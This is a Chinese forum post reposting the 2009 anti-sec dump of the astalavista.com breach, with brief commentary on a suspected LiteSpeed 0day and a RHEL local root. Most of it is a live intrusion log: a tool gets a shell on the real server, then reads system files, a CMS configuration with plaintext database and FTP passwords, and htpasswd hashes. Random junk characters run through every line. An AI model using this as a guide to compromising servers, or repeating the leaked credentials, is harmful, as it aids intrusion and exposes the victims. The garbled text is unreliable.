里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
; f N- X. a& \4 H4 V! M; \7 ~: l/ W4 p# [( i1 @
[root@front3 ~]# curl -I litespeedtech.com& v7 B) @8 C3 p% k3 ^3 s
HTTP/1.1 200 OK% a, O* Z9 l m
Date: Fri, 05 Jun 2009 22:54:51 GMT
! f r t9 i5 Y' n8 M6 W& rServer: LiteSpeed% z# M8 o% P% J8 h. ?4 r
3 q# Z9 H# E4 ^7 T# J& y6 L: S2 @$ R- j: E
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-" T v: f7 m3 E# b8 v
- x/ B1 j8 D' _9 q有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
& I; `4 p& k& u: C
/ o# M, U& y" f1 c6 v! v
, J+ M3 Y) K9 s" M- g1 B3 y/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
4 | t) N3 R: ?4 q) E& E/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
' v* _% @$ x. ^0 T/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \" @1 T! y0 S3 p7 R
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
: j) b0 B3 m2 K) @# Y \/ \/ \/ \/ \/ \/ \/- h! P% t; v6 f
The Hacking & Security Community
/ v2 w" R0 V: B% e T+ @, J[+] Founded in 1997 by a hacker computer enthusiast6 x: ~7 h* g) s6 b9 {) w
[-] Exposed in 2009 by anti-sec group8 V5 e; P9 u7 L$ G& o2 \5 `
. }( R" }. L4 f) \+ T
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:" Z. X% z* s" G) m: I
>> 03. Who’s behind the site?0 L# A0 G: t3 K1 g5 S7 w
>>! R8 S" T# n, }5 v: L |' I
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
; }! _8 h% x8 }4 j" }5 ]3 f# a5 f. z8 o# k
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
X+ { B4 H5 U$ }! ]7 P>>
9 }- \) a2 \1 S" L$ L- [( h>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and& _+ q @! B. c$ K3 j8 I5 E
military institutions.
4 \, F0 }& ?+ L! `% [>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
8 {! `; x" w r+ n
- C4 b; @0 y7 Q8 F5 w% IWhy has Astalavista been targeted?
7 |4 G0 M, ]/ A/ ~% V7 r% c _
Other than the fact that they are not doing any of this for the “community” but' v; n5 N. I A0 [! c
for the money, they spread exploits for kids, claim to be a security community! p9 y2 E0 I. {& X
(with no real sense of security on their own servers), and they charge you $6.66
% \) H2 L# U1 d/ Uper months to access a dead forum with a directory filled with public releases. p' { t8 P. O( ~9 b; ~
and outdated / broken services.) s" [5 i& f1 S# T+ p
+ ^& l! i6 p6 z' Y* ^We wanted to see how good that “team of security and IT professionals” really is.9 L* M0 e$ B( u: H
( M- b; }5 U2 g7 @2 q4 G lLet’s begin.
0 _+ Y3 Y/ u* C2 t6 C- o) u, V: {; ~: ^+ j6 r
anti-sec:~# ./g0tshell astalavista.com -p 80; {% R; n" f5 l$ a; e5 j* J0 \+ o
[+] Connecting to astalavista.com:80% j* Q3 h! d# W9 l) w" ~, u
[+] Grabbing banner…& \$ S6 z: D) ?/ f# \* B- h
LiteSpeed
) K' z2 y: e& ?- V0 G4 [) {[+] Injecting shellcode…
/ Q- G. l7 u5 k) X6 ~! u) l2 h[-] Wait for it
. [( j U1 F1 u% j: y
7 l( H( h* {' S q$ d[~] We g0tshell
* H& L1 ~- n' v) @uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux5 H8 G5 A' n5 W8 A
ID: uid=100(apache) gid=500(apache) groups=500(apache)! @' Q# r) n+ e7 ]* r+ A0 q3 c
* z9 ^0 S! q' H1 y3 ^2 j/ Wsh-3.2$ cat /etc/passwd/ w! I# j, U8 w O
root:x:0:0:root:/root:/bin/bash
$ e' b3 r# g7 O0 Rbin:x:1:1:bin:/bin:/sbin/nologin8 ?- ?/ n" I& p3 i. h. X# D# s6 o
daemon:x:2:2:daemon:/sbin:/sbin/nologin
7 \+ o( g) Q, k% g1 j" P' y+ |- iadm:x:3:4:adm:/var/adm:/sbin/nologin" q. i' N. R4 b" Y
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin. u5 o& t6 a& d( D
sync:x:5:0:sync:/sbin:/bin/sync
6 m. C" H0 w- E. u4 R, gshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
/ b% S+ |- R& N7 Y; G# @halt:x:7:0:halt:/sbin:/sbin/halt7 H* e" y4 U# _) l: }8 K
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
( g/ m: D- Z5 u+ M/ t% V9 gnews:x:9:13:news:/etc/news:
; t9 P6 J! f1 p, o/ m0 Duucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin) A' R0 v' ?$ d/ ~
operator:x:11:0 perator:/root:/sbin/nologin" x9 ^/ U. M: B4 b" E, k- U0 `
games:x:12:100:games:/usr/games:/sbin/nologin
5 D! |2 ^4 L! }8 T* Zgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
) K8 I) b: p* J+ G. Bftp:x:14:50:FTP User:/var/ftp:/sbin/nologin6 J8 B) o' y. E* Z. I0 Q/ r
nobody:x:99:99:Nobody:/:/sbin/nologin
4 U- W9 W. N, K0 h9 B8 {$ ]; T4 Crpm:x:37:37::/var/lib/rpm:/sbin/nologin
+ m! n9 J# {9 ?) t4 v6 f; h% Mdbus:x:81:81:System message bus:/:/sbin/nologin6 Z+ v- V# f& k
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
) A2 [: s, C4 I& v/ \* a/ Bmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin2 f: j8 q6 @! v& o$ q
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin& v" v3 k) @% X* L; v# Y9 M; b
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin! g- m6 k* z0 i1 l
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
4 U6 O3 h w4 @1 @; q- Lrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin9 }7 E2 J1 g6 `, z
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin2 P9 V( L1 @* _1 A# I
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+ R1 d0 y( g4 x* S8 P! K6 esshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
0 c" S" Z% b Y2 K( |) _, T6 X9 Mpcap:x:77:77::/var/arpwatch:/sbin/nologin
* j% ^7 K5 h0 {3 ^) hnamed:x:25:25:Named:/var/named:/sbin/nologin5 K% N0 @8 O; Q0 Z) \) u
apache:x:100:500::/var/www:/bin/false3 f2 c; D' G0 G1 J- A/ v6 _& y
diradmin:x:101:101::/usr/local/directadmin:/bin/bash0 c/ N; J W/ g! s+ {$ f5 z( E
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash, F$ X) H; _9 c9 Y6 n1 y+ H% I
webapps:x:500:501::/var/www/html:/bin/bash
" J% x% }- L& @5 {. ?& mmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
3 N1 x" G7 h: i5 t, qadmin:x:501:502::/home/admin:/bin/bash" a0 S# k; x9 ~" ^4 D9 u! u
jon:x:502:503::/home/jon:/bin/bash
7 [& U; G3 N. ]7 P$ Bcom:x:503:504::/home/com:/bin/bash
; F2 W) ]1 ^9 z5 k( cntp:x:38:38::/etc/ntp:/sbin/nologin) N9 R7 M6 `" _3 l* q/ `* D& \* a: } W
ais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
9 }( z9 P8 A1 F) ?3 v& B: sastanet:x:504:505::/home/astanet:/bin/bash4 y5 }2 U6 c5 o8 K0 |+ ^
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
& H N6 \6 _1 b C3 Cavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin7 A6 V$ G1 O3 N+ d1 k; U; F8 I
# Q& O# L# y6 N2 d. lsh-3.2$ cat /etc/hosts0 y% R# c& Z) k) Y; j
# Do not remove the following line, or various programs/ |& j6 C) _/ j( d" R
# that require network functionality will fail.6 j. D! e. x1 [' N* }
127.0.0.1 localhost.localdomain localhost
/ _( t9 n/ Q" \( w" U4 d! u) H' g" Q::1 localhost6.localdomain6 localhost66 g, b4 x, t% P+ V' \
80.74.154.172 asta1.astalavistaserver.com
1 Q U$ b( W# {5 y9 T9 Z) ^/ p% `' d4 B; P' x
sh-3.2$ pwd
' |- r7 w1 I4 I* t) T2 G# j/home/com/public_html% n5 C( O6 h0 |6 ?% m! h
5 I7 m2 n. X# u$ q2 }3 Y4 k+ N- Dsh-3.2$ ls -la
+ }3 n- U/ ?) q% Stotal 18460. Q$ w3 J$ C# ^" b& w9 q" S, x8 a) s
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
: C' p" B+ i. G9 ^drwx–x–x 11 com com 4096 Jun 25 2008 .., x/ _. u' L: x0 w- j, N* Q
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
5 r% K7 g$ T8 q$ Gdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache( F8 R; Q4 G- J3 s) n4 r7 l! c
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
: S& n L1 _- Jdrwxrwxrwx 2 com com 4096 May 19 00:50 config
* x) m! O( N$ A: P9 P( o. Ddrwxr-xr-x 2 com com 4096 Mar 20 11:05 core; t/ a9 b' w# q0 |+ |! ]
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
( m: `2 u7 V4 t/ B% A2 o8 ddrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing0 L% t+ {3 A' z" }1 j0 k+ B
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo% T) Y2 Q- G, i! ~. E8 s ], z4 J$ E% ?1 T
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__& R; L x( K: S& Z* k
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php$ ?+ \5 e- B' R
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd( R: s. D# Q, ~, d
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor3 Z, z. {/ N1 X/ d" ~
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
" u, L }: B5 e' a, ~! A( ldrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
, P2 c- W, d0 ~# B9 R7 r-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
* l+ s! P1 X1 p: C-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
& j% q3 L d- r) M& D4 @-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
* W& p! |' e' Q# H1 {& Z6 udrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
5 f4 d5 F" l, m( Kdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
& V* Z9 V* F- w6 S, T. G, A-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php4 q3 }* m1 J q# w
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
, u+ P7 ?* l% C) e/ O4 k+ ?5 ?drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
& E! i* [8 y, q! ndrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
. y, q: T7 {+ X0 b1 U! |drwxrwxrwx 12 com com 4096 Jun 2 07:47 media( K' j6 H% }- @7 j4 U& U
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
" m7 H m3 [) S7 h, n. t7 Xdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
( y" e2 N! F5 C% P& m! ]drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
8 c6 [ Y! a& _drwxrwxr-x 22 com com 4096 May 28 17:06 _new
6 u6 N1 c1 `$ Y0 wdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old) o0 D; S, y3 E2 p a
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy! g6 l+ }4 P- G0 y4 m5 S
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy$ f' _! L2 M! Z5 C
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
`% R/ g! y, P8 ?; L( U4 I3 {-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml. o: e2 a8 V- D9 z- e. V0 ~
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
" D; Q8 _) K2 [# V! k* ?9 rdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes3 o% ?( H: z1 h% z6 w) [& k
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp! Y" ~: q8 @# x c4 V& g8 I
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam6 O" b9 }0 a/ L
- f! J k2 ]* |/ |
sh-3.2$ head -20 index.php( Y. V" q( x7 |, O
<?php
. z4 C( Z: m- |$ g" J) G6 o/ W3 L6 b _
/**
6 h0 M5 `5 A O- e# g; k* The main page for the CMS- N' v' R* A, |- [) \6 ^5 G
* @copyright CONTREXX CMS - COMVATION AG
I: ?3 t5 C3 e8 N h* @author Comvation Development Team3 ?" ^8 `& Y9 z
* @version v1.0.9.10.1 stable; q' n/ J. w& b, O \
* @package contrexx
* ?! [, t& r$ A0 [* @subpackage core
. f5 H3 j7 y+ q7 u& n+ f2 ~3 _5 [* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage3 L+ x" ^4 R2 S
* @since v0.0.0.0
' q1 `1 r/ i" ^) d* ~$ m M5 Q* @todo Capitalize all class names in project
3 e7 Q9 N" C+ ?) {, E; J& Q* @uses /config/configuration.php& C$ F- [9 o0 i! z4 S9 y; h
* @uses /config/settings.php
5 f* c$ H" M' Q( Q/ M U+ _$ B* @uses /config/version.php
' g2 J' v9 W8 j7 c* ^" N4 E* @uses /core/API.php
! m0 a$ y- o8 C" f$ q/ L* @uses /core_modules/cache/index.class.php
+ j* X4 _1 L* G: U* s' G" A* @uses /core/error.class.php
; T6 r" D" D) u1 ]% L* @uses /core_modules/banner/index.class.php
' Z2 S* p/ f( C& f* @uses /core_modules/contact/index.class.php8 U2 o* D1 q' Z2 }
/ N( ?' o. j; r3 U, n3 w% Zsh-3.2$ cd config/
: M- A- p( Q' gsh-3.2$ ls -la' M5 g- c/ o% @, z. o: J: E
total 32) v s9 A) n' Y9 S' [! }) |1 N
drwxrwxrwx 2 com com 4096 May 19 00:50 .# K' h, W$ w+ s8 l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- o- S5 Q2 B! P! E% ~8 p, f-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php) M% `7 f* V/ |( m/ a( t3 E2 C
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php9 |3 B( Q: J/ q
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php- f% N$ ]0 F) `! {5 I6 K# |
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
, q* [& v1 z6 h1 B6 w
! a \6 x5 e! \9 ssh-3.2$ cat configuration.php
7 E7 }" v% d8 t: K0 ?; P[snip]
3 }9 a( ]5 S, M, k9 d( \$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost: o" Z; v4 |2 j/ Z
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name# }( K( ?7 ^9 r
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
, ]+ M, N2 P, {8 x" A% {& n$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username9 W& W! Y) }. n1 N; T( q
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password0 N6 x( y$ \% i p5 g8 g$ g
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)/ L {6 P1 C6 w5 r1 C1 H1 O2 ~
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)2 B3 P- n7 T: A$ Z9 |/ Q
[snip]
$ p8 b% s/ M% f. ]& u- E ^3 {$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
3 P k: Y3 _$ K$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
5 p# Y, ^- \8 r& S- N$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost: N/ l5 w6 \% J( I
$_FTPCONFIG['port'] = 21; // Ftp remote port' X# B4 t: @5 a4 O1 J2 {
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
! T4 D# I: e& e; v: _' w$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password& [) K+ j) Y! L7 |( J. B
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms& F5 w) U. j, y* e0 E) C9 Y! |; q
* C5 t4 ~$ D" Z$ V: v- @ B
sh-3.2$ cd ..
# J% u% O$ E/ V6 ?sh-3.2$ cd dvd/
A! X1 w; R0 b, f+ Ush-3.2$ ls -la
8 a( p3 M% O3 V, |total 2913780
2 i5 n% t0 O+ p m; e8 ]4 _drwxr-xr-x 2 com com 4096 Sep 9 2008 .) f- y: ~1 C6 F {. e, U! J
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..) L! y" }* W5 k* N. d. h% j& I ^
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
& o9 t( Q f" a3 H: Y-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
7 H: C. e- a4 {3 F& r1 J! H5 X-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
/ U! l. A$ j- ^5 \-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
f; t5 v$ R! B7 l0 m: P
; S3 w1 u4 j% L5 R+ Q9 bsh-3.2$ cat .htaccess
/ P5 f$ h0 A ?authType Basic
; ?1 ]) i" I% @authName DVD
0 N9 N* ?1 R4 t/ ]authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 ~* K: ~# c q, N$ w; orequire valid-user, a4 h) s" x4 y! }4 ^, \$ o9 M5 ~
5 v9 U( P1 \" {) t/ d+ W
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd% Y2 }$ \- I, f- B
DVDdownload:CRD8cuY6.MPT6
' v+ t( b6 y6 w1 R3 q. gDVDdownload2:CR8a36.wluFMg$ A& \3 Y2 m3 K( W
) F1 B Z' o, }( B& }7 o1 R% A
sh-3.2$ cat test.php5 o8 |3 \: A) F
<?php
6 o* m; b* [$ B6 B t& `. }$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;. \* B4 _1 k) c/ i. U9 X0 S
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
0 V# ^8 E6 O2 a- w; _& Mecho $url;/ x. n7 o; M6 h6 e! w8 g# m6 N3 b
?>
- U1 l6 s! S$ Z1 u) I0 I8 Y; N; ^
" V! F2 r1 Z" q& U% ash-3.2$ cd modifications/
0 q' D" F6 W5 H5 o$ [7 \" `" qsh-3.2$ ls -la
/ L- I1 H d$ h; f2 _, ^; ?total 32
) v, x2 F" m, C+ ldrwxr-xr-x 8 com com 4096 May 11 12:48 . A# w5 }2 c# h1 l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..8 P8 {3 d' Y2 P$ d
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
1 Y7 S! p$ `6 t3 D! G$ pdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs! R. h6 E; p. N7 k3 K
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
& Q8 N6 v3 h5 A+ O0 }+ V" F% wdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc$ j* T3 g& t9 \ w8 A+ N* w1 J8 T
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
! N3 n) c# O/ q4 ^% Sdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
# E0 Q3 K, O/ y1 _
+ Q! o& S5 |5 U& osh-3.2$ ls -R
7 _7 q9 Z$ ~2 h8 C.:% V8 L S/ z: @# y/ J
com_avtng cronjobs onlinetools pjirc search _tmp
2 H/ ~# v3 l& r" l
) a- Z$ y+ n% ?- m/ j! [ i5 x./com_avtng:
# X1 A0 a: l Y' Havtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
q; K) U. c/ @( I$ u
- f8 _. y, j w6 ~+ N% a2 e* C6 X9 j./com_avtng/scripts:
+ S2 m, ]& [# L. Q8 b+ f L Q% Epopunder.js& @; O, ^- ?7 X/ U, j2 j* ~
; [2 R) V8 l: ?7 i* v4 P
./cronjobs:' @) K4 l5 d: E2 U5 ?* Z9 |& ^
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
, N- t. }0 C4 C/ H% E, p, c0 B! D, @( t" H& g
./cronjobs/tmp:; e* c4 d: h% y+ L* h& m( \3 T
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv! @6 j9 U H. {2 S; `
9 ~7 t4 e5 q5 N& u3 @- E./onlinetools:
+ ?! F+ x: v8 n; B# q& Zindex.php
9 s4 ^+ `5 F9 {( _ I/ J0 g; U, N1 w1 B. x, W' o: z; X: N
./pjirc:
# u5 X" w% F4 H- B: o+ ?a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt3 Y3 _) k. E# N$ _
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
' M; C" _+ f- ~- Lbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd% P* t+ Y) G' J
) u0 P, F0 x" M, Z" S1 I
./pjirc/img:
) U3 ~+ n6 z! vange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif8 _. n2 d6 ^% M: r& w( @
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
8 {; P( O! b& |8 U4 H5 dverre-eau.gif
/ h" h8 M- U' P" m2 {0 _argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif - F& K$ }8 G# C' t; @) D# f* J
verre-vin.gif+ U2 F+ V( i5 i+ v
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
$ e' X0 S' S' K$ y4 z, ebiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
5 [+ D. d; Y" T- V( @6 O/ m6 z
, `7 }7 P; u }% Q$ ^/ V! v./pjirc/snd:
* r0 k# G- H+ @1 v! ?4 [bell2.au ding.au
5 ]6 J7 A( c0 Y( I' f! j! S
) j( z$ c7 T$ P./search:
& p1 Q" S6 q' _5 v4 e2 B2 W1 msearchEngines.php search.php2 a* P8 o4 |. h+ ? g5 N
2 H0 _ S- ?% x$ o& s
./_tmp:$ c- v- Z8 F. s0 x3 u- O# Z
defaultPorts.php defaultPorts.txt s" X2 y$ C. u) ~
8 _% T: E e* Z& }! qsh-3.2$ cd cronjobs/ c) z( m/ O0 d
sh-3.2$ cat exploits.php
+ P6 C; Z+ a' @" J: W/ ~[snip]
: K) u* Z( l# W$categories = array();9 K% G3 s- m; ]3 X, U
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;( w' B0 c, k5 p
$expolits = file($milw0rmFile);3 E! ?+ @3 O, a
$comExploits = array();! P9 ~9 [. D4 o* O: s% b
[snip]# u7 [& F8 j& T2 h
// manage data
4 i; r. y( g* D2 K7 X! cfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640# B% t( r* U3 q
2 F6 {" \: O) J; Q& G
// get path and title! V: p5 S6 C- z* x& C6 x
$expolits[$x] = trim($expolits[$x]);
( l `7 w% ?6 x' {5 W $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
5 V: ~+ k* @* H ~ $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
+ Q* N1 v9 v4 x/ z v# S: S& a9 @* X9 D, S& L1 t0 A5 }: X; B
// check if file exists
% `3 f2 o, |: w" m* {# O3 s if (file_exists($path)) {- ]! O6 V1 H% Q: z0 ]
' c0 q v5 S% }0 o) |/ r) l
$text = file_get_contents($path);; \6 r( w$ i$ G# q0 r4 |" i
( W% D" R8 r7 o s1 ^# J // get content and date
- D" P0 W* N7 c& Y) U; b* M //$text = htmlspecialchars($text, ENT_QUOTES);
' ~) i4 K6 A1 d- h4 _# D3 E% Z% e $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));1 g: ]0 p: B9 f8 H, Q
if ($tmptext != ”) {
# T3 N f. l+ P4 }& e $text = $tmptext;
! v/ I* |/ @' u } else {
/ n3 A5 y Z7 @0 f& g $text = addslashes(htmlentities($text, ENT_QUOTES));
) d+ v2 q5 m9 {( C- T }* b" o( _2 g5 @
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));4 s; Y8 y' \+ Y8 @/ P
$tmp = explode('-', $date);. D! E% x# c6 R& G( ?7 J2 o# n
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
4 t, K0 s7 ~; |2 `, F* _2 p6 ? $cat = getCategory ($path);
4 r& b: z' ~* a, F( b* p $ext = pathinfo(basename($path));& T) |7 _6 z( V5 E; z
$ext = $ext['extension'];* l0 H% m* D5 A9 n7 g; R
$qStr = ”
0 `, M b% U8 Z3 I: b/ r$ X SELECT `id`) F+ S8 a1 u5 D. a
FROM `contrexx_module_exploits`( r9 k& C. i: n5 X* d1 O# Q; b
WHERE `title` = ‘” . $title . “‘
0 e# o( Q" n) g. j4 O AND `date` = ‘” . $date . “‘ {5 \1 l' R: [7 R. K
“;
5 n p7 E) p& S1 z) A echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
6 L" s' Y: _, K0 i+ s $q = $_objDB->query($qStr);+ w6 L1 x5 v: r! b; b
" g- N6 M, I, I- ~" { if ($q->numRows() == 0) {5 F' d1 u* u* }- W8 ]8 C: F
; |: @4 {( i' G3 ]8 H, P. C4 | Z
// prepare array
, M( @, L5 l; j# l; c $comExploits[$x]['date'] = $date;1 |/ F9 C3 E1 X% r( u
$comExploits[$x]['title'] = $title;
, g% p* E9 \' f( T0 W& s $comExploits[$x]['author'] = ‘milw0rm’;# t7 q2 {. V( ^0 x
$comExploits[$x]['text'] = $text;
& Z2 S, K9 Z4 `1 d $comExploits[$x]['source'] = $ext;
! O( ?: u; b* C% ^; j+ D $comExploits[$x]['url1'] = ”;0 i! y9 \. P. p5 y
$comExploits[$x]['url2'] = ”;& u o% e* ?' E! ~# S( Q* l8 Y
$comExploits[$x]['catid'] = $cat; N4 X& J' Z& v
$comExploits[$x]['lang'] = ‘2′;5 E2 {8 h& ^2 P- i9 x
$comExploits[$x]['userid'] = ‘12′; |7 @9 _! C# x t
$comExploits[$x]['startdate'] = ‘0000-00-00′;
, C5 o( Y @3 H8 m0 H $comExploits[$x]['enddate'] = ‘0000-00-00′;
' \1 F4 f0 G! q $comExploits[$x]['status'] = ‘1′;
+ ~8 T& B' Q7 X7 U" _$ W $comExploits[$x]['changelog'] = $date;
4 F! V- }6 z4 N: }$ b! \% q% U; d1 _) G! z: D* f% @: T; P) i
}/ p) ^9 F! D7 e' E. t: {' D, L
[snip]5 _9 c' n$ {/ W
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
' E3 U& f3 T b# s: v' q+ @9 _<rss version=”2.0″>* |& z- _! g9 e- Q& q1 [
<channel>( ?2 a& ?+ C7 I6 {- C z
<title>ASTALAVISTA.com - Exploits</title>, ~: p; v& F& a; ? ~
<link>http://www.astalavista.com/exploits</link>% B) L" R _; J5 y) b, R' ~4 x0 X" C
<description>All availably Exploits.</description>* y6 p9 _- j, J$ ? A' ~5 U2 E
<language>en-us</language>
